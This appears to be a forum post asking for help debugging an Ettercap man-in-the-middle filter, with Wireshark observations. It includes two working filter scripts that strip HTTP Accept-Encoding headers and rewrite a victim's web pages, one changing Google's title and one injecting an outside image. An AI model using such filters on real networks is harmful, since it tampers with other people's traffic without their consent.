Hello,

First of all, I'm posting here because the Ettercap forums don't work (I can't register).

I'm trying to do an easy Ettercap filter but it doesn't seem to work. The filter is:
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as orig$
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   replace("<title>Google</title>", "<title>Google H4CK3D</title>");
   msg("Filter Ran.\n");
}
The MiM attack works (I can see SSL connections).

If I load the Google page on the victim's computer, the source page still has <title>Google</title>.

In Wireshark I can see one request from the Victim with:

Code:
Accept-Encoding: gzip,deflate\r\n
and then a second one:
Code:
Accept-Rubbish!: gzip,deflate\r\n
but the second request is marked as "TCP out of order". I don't really know what that means.

Then I can see an answer from Google containing the "H4CK3D" title. It's again marked as "TCP out of order".

Anyway, the victim's Google page does not contain the modified code.

Thanks for your advice.

If I use this filter, from the IronGeek tutorial, it works fine:
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}